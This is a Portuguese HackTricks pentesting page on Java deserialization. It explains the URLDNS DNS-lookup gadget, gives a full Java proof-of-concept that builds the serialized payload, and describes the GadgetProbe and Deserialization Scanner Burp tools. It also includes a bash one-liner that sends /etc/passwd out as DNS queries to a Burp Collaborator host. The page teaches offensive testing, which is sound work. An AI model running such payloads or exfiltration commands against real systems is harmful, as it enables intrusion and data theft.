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# Java DNS Deserialization, GadgetProbe e Scanner de Deserialização Java
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## Solicitação DNS na deserialização
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A classe `java.net.URL` implementa `Serializable`, o que significa que essa classe pode ser serializada.
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```java
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public final class URL implements java.io.Serializable {
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```
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Esta classe tem um **comportamento curioso**. De acordo com a documentação: "**Dois hosts são considerados equivalentes se ambos os nomes de host puderem ser resolvidos para os mesmos endereços IP**".\
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Assim, sempre que um objeto URL chama **qualquer** das **funções `equals`** ou **`hashCode`** um **pedido DNS** para obter o endereço IP será **enviado**.
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**Chamar** a função **`hashCode`** de um objeto **URL** é bastante simples, basta inserir este objeto dentro de um `HashMap` que será desserializado. Isso ocorre porque **no final** da função **`readObject`** do `HashMap`, este código é executado:
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```java
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private void readObject(java.io.ObjectInputStream s)
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throws IOException, ClassNotFoundException {
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[ ... ]
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for (int i = 0; i < mappings; i++) {
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[ ... ]
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putVal(hash(key), key, value, false, false);
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}
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```
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É **executado** o `putVal` com cada valor dentro do `HashMap`. No entanto, mais relevante é a chamada para `hash` com cada valor. Este é o código da função `hash`:
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```java
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static final int hash(Object key) {
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int h;
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return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
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}
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```
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Como você pode observar, **ao desserializar** um **`HashMap`**, a função `hash` será **executada com cada objeto** e **durante** a execução do **`hash`**, **será executado `.hashCode()` do objeto**. Portanto, se você **desserializar** um **`HashMap`** **contendo** um objeto **URL**, o objeto **URL** irá **executar** `.hashCode()`.
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Agora, vamos dar uma olhada no código de `URLObject.hashCode()`:
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```java
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public synchronized int hashCode() {
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if (hashCode != -1)
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return hashCode;
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hashCode = handler.hashCode(this);
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return hashCode;
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```
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Como você pode ver, quando um `URLObject` executa `.hashCode()`, é chamado `hashCode(this)`. A seguir, você pode ver o código desta função:
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```java
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protected int hashCode(URL u) {
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int h = 0;
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// Generate the protocol part.
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String protocol = u.getProtocol();
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if (protocol != null)
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h += protocol.hashCode();
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// Generate the host part.
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InetAddress addr = getHostAddress(u);
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[ ... ]
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```
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Pode-se observar que um `getHostAddress` é executado para o domínio, **lançando uma consulta DNS**.
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Portanto, essa classe pode ser **abusada** para **lançar** uma **consulta DNS** a fim de **demonstrar** que a **desserialização** é possível, ou até mesmo para **exfiltrar informações** (você pode anexar como subdomínio a saída de uma execução de comando).
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### Exemplo de código de payload URLDNS
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Você pode encontrar o [código de payload URLDNS do ysoserial aqui](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). No entanto, apenas para facilitar o entendimento de como codificá-lo, criei meu próprio PoC (baseado no do ysoserial):
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```java
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import java.io.File;
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import java.io.FileInputStream;
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import java.io.FileOutputStream;
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import java.io.IOException;
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import java.io.ObjectInputStream;
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import java.io.ObjectOutputStream;
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import java.lang.reflect.Field;
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import java.net.InetAddress;
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import java.net.URLConnection;
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import java.net.URLStreamHandler;
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import java.util.HashMap;
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import java.net.URL;
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public class URLDNS {
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public static void GeneratePayload(Object instance, String file)
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throws Exception {
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//Serialize the constructed payload and write it to the file
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File f = new File(file);
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ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
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out.writeObject(instance);
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out.flush();
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out.close();
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}
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public static void payloadTest(String file) throws Exception {
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//Read the written payload and deserialize it
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ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
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Object obj = in.readObject();
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System.out.println(obj);
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in.close();
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}
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public static void main(final String[] args) throws Exception {
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String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
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HashMap ht = new HashMap(); // HashMap that will contain the URL
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URLStreamHandler handler = new SilentURLStreamHandler();
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URL u = new URL(null, url, handler); // URL to use as the Key
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ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
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// During the put above, the URL's hashCode is calculated and cached.
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// This resets that so the next time hashCode is called a DNS lookup will be triggered.
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final Field field = u.getClass().getDeclaredField("hashCode");
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field.setAccessible(true);
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field.set(u, -1);
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//Test the payloads
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GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
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}
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}
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class SilentURLStreamHandler extends URLStreamHandler {
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protected URLConnection openConnection(URL u) throws IOException {
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return null;
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}
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protected synchronized InetAddress getHostAddress(URL u) {
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return null;
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}
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}
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```
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### Mais informações
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* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
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* Na ideia original, o payload do commons collections foi alterado para realizar uma consulta DNS, o que era menos confiável do que o método proposto, mas este é o post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
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## GadgetProbe
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Você pode baixar o [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) na Burp Suite App Store (Extender).
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**GadgetProbe** tentará descobrir se algumas **classes Java existem** no servidor Java para que você possa saber **se** ele é **vulnerável** a algum exploit conhecido.
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### Como funciona
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**GadgetProbe** usará o mesmo **payload DNS da seção anterior**, mas **antes** de executar a consulta DNS, ele **tentará desserializar uma classe arbitrária**. Se a **classe arbitrária existir**, a **consulta DNS** será **enviada** e o GadgetProbe notará que essa classe existe. Se a **solicitação DNS** não for **enviada**, isso significa que a **classe arbitrária não foi desserializada** com sucesso, então ela não está presente ou não é **serializável/exploitável**.
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Dentro do github, o [**GadgetProbe tem algumas listas de palavras**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) com classes Java para serem testadas.
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![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
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### Mais informações
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* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
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## Scanner de Desserialização Java
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Este scanner pode ser **baixado** na Burp App Store (**Extender**).\
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A **extensão** possui **capacidades** passivas e ativas.
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### Passivo
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Por padrão, ele **verifica passivamente** todas as solicitações e respostas enviadas **procurando por bytes mágicos serializados em Java** e apresentará um aviso de vulnerabilidade se encontrar algum:
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![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (290).png>)
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### Ativo
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**Teste Manual**
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Você pode selecionar uma solicitação, clicar com o botão direito e `Enviar solicitação para DS - Teste Manual`.\
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Em seguida, dentro da _Guia do Scanner de Desserialização_ --> _Guia de teste manual_, você pode selecionar o **ponto de inserção**. E **iniciar o teste** (Selecione o ataque apropriado dependendo da codificação usada).
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![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/3-1.png)
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Mesmo que seja chamado de "Teste Manual", é bastante **automatizado**. Ele verificará automaticamente se a **desserialização** é **vulnerável** a **qualquer payload ysoserial** verificando as bibliotecas presentes no servidor web e destacará as vulneráveis. Para **verificar** as **bibliotecas vulneráveis**, você pode optar por lançar **Javas Sleeps**, **sleeps** via **consumo de CPU**, ou usando **DNS** como mencionado anteriormente.
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**Explorando**
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Depois de identificar uma biblioteca vulnerável, você pode enviar a solicitação para a _Guia de Exploração_.\
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Nesta guia, você deve **selecionar** o **ponto de injeção** novamente, e **escrever** a **biblioteca vulnerável** para a qual deseja criar um payload e o **comando**. Em seguida, basta pressionar o botão de **Ataque** apropriado.
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![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/4 (1).png>)
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### Informações de Exfiltração DNS de Desserialização Java
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Faça seu payload executar algo como o seguinte:
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```bash
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(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
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```
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### Mais Informações
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* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
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<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
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Outras formas de apoiar o HackTricks:
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* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
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* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
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* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
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